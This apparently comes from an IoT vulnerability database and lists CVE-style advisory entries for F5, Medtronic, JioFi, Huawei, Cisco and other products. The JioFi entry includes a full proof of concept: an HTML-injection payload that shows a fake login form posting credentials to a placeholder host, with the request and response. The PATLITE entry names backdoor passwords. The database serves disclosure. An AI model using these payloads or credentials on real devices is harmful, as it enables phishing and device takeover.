VARIoT IoT vulnerabilities database

On BIG-IP 11.5.1-11.5.8, 11.6.1-11.6.3, and 12.0.x, an undisclosed sequence of packets received by an SSL virtual server and processed by an associated Client SSL or Server SSL profile may cause a denial of service. plural BIG-IP The product contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Multiple F5 BIG-IP Products are prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause a denial of service condition. BIG-IP 11.5.1 through 11.5.8, 11.6.1 through 11.6.3, and 12.0.0 are vulnerable. F5 BIG-IP is an application delivery platform integrated with network traffic management, application security management, load balancing and other functions of the US company F5. Security vulnerabilities exist in F5 BIG-IP versions 12.0.x, 11.6.0 through 11.6.3, and 11.5.0 through 11.5.8

In BIG-IP 11.5.1-11.5.8 and 11.6.1-11.6.3, the Configuration Utility login page may not follow best security practices when handling a malicious request. plural BIG-IP The product contains vulnerabilities related to security functions.Information may be obtained. Multiple F5 BIG-IP Products are prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks. BIG-IP 11.5.1 through 11.5.8 and 11.6.1 through 11.6.3 are vulnerable. F5 BIG-IP is an application delivery platform integrated with network traffic management, application security management, load balancing and other functions of the US company F5. Attackers can exploit this vulnerability to obtain sensitive information

The Conexus telemetry protocol utilized within Medtronic MyCareLink Monitor versions 24950 and 24952, CareLink Monitor version 2490C, CareLink 2090 Programmer, Amplia CRT-D, Claria CRT-D, Compia CRT-D, Concerto CRT-D, Concerto II CRT-D, Consulta CRT-D, Evera ICD, Maximo II CRT-D and ICD, Mirro ICD, Nayamed ND ICD, Primo ICD, Protecta ICD and CRT-D, Secura ICD, Virtuoso ICD, Virtuoso II ICD, Visia AF ICD, and Viva CRT-D does not implement encryption. An attacker with adjacent short-range access to a target product can listen to communications, including the transmission of sensitive data. plural Medtronic The product contains cryptographic vulnerabilities.Information may be obtained. MyCareLink Monitor and others are products developed by Medtronic. An access control error vulnerability exists in several Medtronic products that stems from the failure of the Conexus telemetry protocol to perform cryptographic operations that an attacker can use to intercept communications (including sensitive information transmitted). Medtronic Conexus Radio Frequency Telemetry Protocol is prone to multiple security vulnerabilities. An attacker can exploit this issue to gain access to sensitive information and bypass the security mechanism and gain unauthorized access. This may lead to further attacks

The Conexus telemetry protocol utilized within Medtronic MyCareLink Monitor versions 24950 and 24952, CareLink Monitor version 2490C, CareLink 2090 Programmer, Amplia CRT-D, Claria CRT-D, Compia CRT-D, Concerto CRT-D, Concerto II CRT-D, Consulta CRT-D, Evera ICD, Maximo II CRT-D and ICD, Mirro ICD, Nayamed ND ICD, Primo ICD, Protecta ICD and CRT-D, Secura ICD, Virtuoso ICD, Virtuoso II ICD, Visia AF ICD, and Viva CRT-D does not implement authentication or authorization. An attacker with adjacent short-range access to an affected product, in situations where the product’s radio is turned on, can inject, replay, modify, and/or intercept data within the telemetry communication. This communication protocol provides the ability to read and write memory values to affected implanted cardiac devices; therefore, an attacker could exploit this communication protocol to change memory in the implanted cardiac device. plural Medtronic The product contains an access control vulnerability.Information may be tampered with. MyCareLink Monitor and others are products developed by Medtronic. Medtronic Conexus Radio Frequency Telemetry Protocol is prone to multiple security vulnerabilities. An attacker can exploit this issue to gain access to sensitive information and bypass the security mechanism and gain unauthorized access. This may lead to further attacks

cgi-bin/webscr?cmd=_cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.8 for WordPress allows Parameter Tampering in an amount parameter (such as amount_1), as demonstrated by purchasing an item for lower than the intended price. NOTE: The plugin author states it is true that the amount can be manipulated in the PayPal payment flow. However, the amount is validated against the WooCommerce order total before completing the order, and if it doesn’t match then the order will be left in an “On Hold” state. WordPress is a blogging platform developed by the WordPress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. An attacker could exploit this vulnerability via the 'amount' parameter to alter application data such as user credentials, permissions, price, or item quantity

JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings (aka a SetWiFi_Setting request to cgi-bin/qcmap_web_cgi). JioFi 4G M2S The device contains a cross-site request forgery vulnerability.Information may be tampered with. A remote attacker could use the SSID name and Security Key fields to exploit this vulnerability to perform operations with administrative privileges

cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. JioFi 4G M2S The device contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. There is a security vulnerability in the cgi-bin/qcmap_web_cgi URL in JioFi 4G M2S version 1.0.2. # Exploit Author: Vikas Chaudhary # Date: 21-01-2019 # Vendor Homepage: https://www.jio.com/ # Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29 # Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router # Category: Hardware # Contact: https://www.facebook.com/profile.php?id=100011287630308 # Web: https://gkaim.com/ # Tested on: Windows 10 X64- Firefox-65.0 # CVE-2019-7438 *********************************************************************** ## Vulnerability Description => HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust. ---------------------------------------- # Proof Of ConceptoC 1- First Open BurpSuite 2- Make Intercept on 3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ] 4-Capture the data and then Spider the Host 5- Now You find a Link like like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ] 6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ] 7-Vulnerable parameter is => mash 8-Paste this PAYLOAD in mask parameter and then show Response in browser Payload => <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div> 9- You will see a fake Login page on the screen - ---------------------------------------------------------------------------------- Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter - ---------------------------------------------------------------------------------- REQUEST ------------------- POST /cgi-bin/qcmap_web_cgi HTTP/1.1 Host: 192.168.225.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.225.1/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 550 Connection: close Page=GetWANInfo&mask=<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>&token=0 **************************** RESPONSE ----------------- HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 X-Frame-Options: SAMEORIGIN connection: close Content-Type: text/html Content-Length: 1167 Date: Mon, 21 Jan 2019 18:02:07 GMT Server: lighttpd/1.4.35 {"Page":"GetWANInfo","Mask":"<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>","wan_status":"On","total_data_used":"10005648","wan_operation_mode":"NAT","wan_connection_mode":"DHCP","wan_mac":"40:C8:CB:07:2C:8A","host_name":"JMR1140-072C8A","multi_pdn":"Disabled","ipv4_addr":"10.153.220.101","ipv4_subnet":"255.255.255.252","ipv4_gateway":"10.153.220.102","ipv4_primary":"49.45.0.1","ipv4_secondary":"0.0.0.0","ipv6_addr":"2409:4060:218e:b511:89ec:3214:def1:f75b","ipv6_subnet":"64","ipv6_gateway":"fe80::c9b3:928a:5eca:7e1c","ipv6_primary":"2405:200:800::1","ipv6_secondary":"::","channel":"automatic","packet_loss":"0 / 0","total_data_used_dlink":"5.11 MB","total_data_used_ulink":"4.37 MB"} ---------------------------------------------------------------------------------------------------------------

cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter. JioFi 4G M2S The device contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. There is a security vulnerability in the cgi-bin/qcmap_web_cgi URL in JioFi 4G M2S version 1.0.2. An attacker can exploit this vulnerability by using a POST request 'mask' to cause a denial of service (hang)

PrinterOn Enterprise 4.1.4 suffers from multiple authenticated stored XSS vulnerabilities via the (1) "Machine Host Name" or "Server Serial Number" field in the clustering configuration, (2) "name" field in the Edit Group configuration, (3) "Rule Name" field in the Access Control configuration, (4) "Service Name" in the Service Configuration, or (5) First Name or Last Name field in the Edit Account configuration. PrinterOn Enterprise Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. PrinterOn Enterprise is a set of secure cloud printing solutions from PrinterOn Canada. The solution supports printing from laptops, desktops, and mobile devices to connected printers. There is a cross-site scripting vulnerability in PrinterOn Enterprise 4.1.4, which is caused by the lack of proper validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

Siemens Wincc v7.3 is a process monitoring system. There is a file upload vulnerability in Siemens Wincc v7.3, which can be exploited by an attacker to perform arbitrary programs

A Denial of Service vulnerability related to message decoding in lmgrd and vendor daemon components of FlexNet Publisher version 11.16.1.0 and earlier allows a remote attacker to send a combination of messages to lmgrd or the vendor daemon, causing the heartbeat between lmgrd and the vendor daemon to stop, and the vendor daemon to shut down. FlexNet Publisher Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Schneider Electric Floating License Manager is prone to multiple security vulnerabilities Attackers can exploit these issues to shut down the affected device, denying service to legitimate users. Floating License Manager version 2.3.0.0 and prior are vulnerable

A Denial of Service vulnerability related to adding an item to a list in lmgrd and vendor daemon components of FlexNet Publisher version 11.16.1.0 and earlier allows a remote attacker to send a combination of messages to lmgrd or the vendor daemon, causing the heartbeat between lmgrd and the vendor daemon to stop, and the vendor daemon to shut down. FlexNet Publisher Contains an input validation vulnerability.Denial of service (DoS) May be in a state. Schneider Electric Floating License Manager is prone to multiple security vulnerabilities Attackers can exploit these issues to shut down the affected device, denying service to legitimate users. Floating License Manager version 2.3.0.0 and prior are vulnerable

A Denial of Service vulnerability related to preemptive item deletion in lmgrd and vendor daemon components of FlexNet Publisher version 11.16.1.0 and earlier allows a remote attacker to send a combination of messages to lmgrd or the vendor daemon, causing the heartbeat between lmgrd and the vendor daemon to stop, and the vendor daemon to shut down. FlexNet Publisher Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Schneider Electric Floating License Manager is prone to multiple security vulnerabilities Attackers can exploit these issues to shut down the affected device, denying service to legitimate users. Floating License Manager version 2.3.0.0 and prior are vulnerable

An issue was discovered in the Bose Soundtouch app 18.1.4 for iOS. There is no frontend input validation of the device name. A malicious device name can execute JavaScript on the registered Bose User Account if a speaker has been connected to the app. Bose Soundtouch The application contains a cross-site scripting vulnerability.Information may be obtained and information may be altered

A hidden backdoor on PATLITE NH-FB Series devices with firmware version 1.45 or earlier, NH-FV Series devices with firmware version 1.10 or earlier, and NBM Series devices with firmware version 1.09 or earlier allow attackers to enable an SSH daemon via the "kankichi" or "kamiyo4" password to the _secret1.htm URI. Subsequently, the default password of root for the root account allows an attacker to conduct remote code execution and as a result take over the system. PATLITE NBM-D88N , NHL-3FB1 , NHL-3FV1N Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. A trust management issue vulnerability exists in PATLITE NH-FB Series, NH-FV Series, and NBM Series. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components

Buffer overflow in prot_get_ring_space in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 SM-G920F G920FXXU5EQH7 allows an attacker (who has obtained code execution on the Wi-Fi chip) to overwrite kernel memory due to improper validation of the ring buffer read pointer. The Samsung ID is SVE-2018-12029. Samsung Galaxy S6 Contains a buffer error vulnerability. Vendors have confirmed this vulnerability Samsung ID: SVE-2018-12029 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Samsung Galaxy S6 is a smart phone of South Korea's Samsung (Samsung) company. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not verified correctly, resulting in execution to other associated memory locations. erroneous read and write operations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc

An exploitable heap overflow vulnerability exists in the mdnscap binary of the CUJO Smart Firewall running firmware 7003. The string lengths are handled incorrectly when parsing character strings in mDNS resource records, leading to arbitrary code execution in the context of the mdnscap process. An unauthenticated attacker can send an mDNS message to trigger this vulnerability. CUJO Smart Firewall Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CUJOSmartFirewall is a home smart firewall device from CUJO

There is a digital signature verification bypass vulnerability in AR1200, AR1200-S, AR150, AR160, AR200, AR2200, AR2200-S, AR3200, SRG1300, SRG2300 and SRG3300 Huawei routers. The vulnerability is due to the affected software improperly verifying digital signatures for the software image in the affected device. A local attacker with high privilege may exploit the vulnerability to bypass integrity checks for software images and install a malicious software image on the affected device. plural Huawei Vulnerability related to verification of digital signatures exists in routers made by the manufacturer.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Huawei AR1200 is an enterprise router of China Huawei. There are security vulnerabilities in several Huawei products. The following products and versions are affected: Huawei AR1200 V200R007C00 Version, V200R008C20 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 Version; AR1200-S V200R007C00 Version, V200R008C20 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 Version; AR150 V200R007C00 Version, V200R008C20 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 Version; AR160 V200R007C00 Version, V200R008C20 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 Version; AR200 V200R007C00 Version, V200R008C20 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 Version; AR2200 V200R007C00 Version, V200R008C20 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 Version; AR2200-S V200R007C00 Version, V200R008C20 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 Version; AR3200 V200R007C00 Version, V200R008C20 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 Version; SRG1300 V200R007C00 Version, V200R008C50 Version, V200R009C00 Version, V200R010C00 version; SRG2300 Version V200R007C00, Version V200R008C50, Version V200R009C00, Version V200R010C00; SRG3300 Version V200R007C00, Version V200R008C50, Version V200R009C00, Version V200R010C00. ?

The IBM Power 9 OP910, OP920, and FW910 boot firmware's bootloader is responsible for loading and validating the initial boot firmware image that drives the rest of the system's hardware initialization. The bootloader firmware contains a buffer overflow vulnerability such that, if an attacker were able to replace the initial boot firmware image with a very carefully crafted and sufficiently large, malicious replacement, it could cause the bootloader, during the load of that image, to overwrite its own instruction memory and circumvent secure boot protections, install trojans, etc. IBM X-Force ID: 154345. Vendors have confirmed this vulnerability IBM X-Force ID: 154345 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. IBM Power System S922 and so on are all server equipment based on Power processor of American IBM company. Attackers can use this vulnerability to overwrite the bootloader's instruction memory, bypass safe boot protection, and install Trojan horse programs

A vulnerability in the web-based management interface of Session Initiation Protocol (SIP) Software for Cisco IP Phone 7800 Series and Cisco IP Phone 8800 Series could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code. The vulnerability exists because the software improperly validates user-supplied input during user authentication. An attacker could exploit this vulnerability by connecting to an affected device using HTTP and supplying malicious user credentials. A successful exploit could allow the attacker to trigger a reload of an affected device, resulting in a DoS condition, or to execute arbitrary code with the privileges of the app user. Cisco fixed this vulnerability in the following SIP Software releases: 10.3(1)SR5 and later for Cisco Unified IP Conference Phone 8831; 11.0(4)SR3 and later for Cisco Wireless IP Phone 8821 and 8821-EX; and 12.5(1)SR1 and later for the rest of the Cisco IP Phone 7800 Series and 8800 Series. These issues are being tracked by Cisco Bug IDs CSCvn56168, CSCvn72540 and CSCvo05687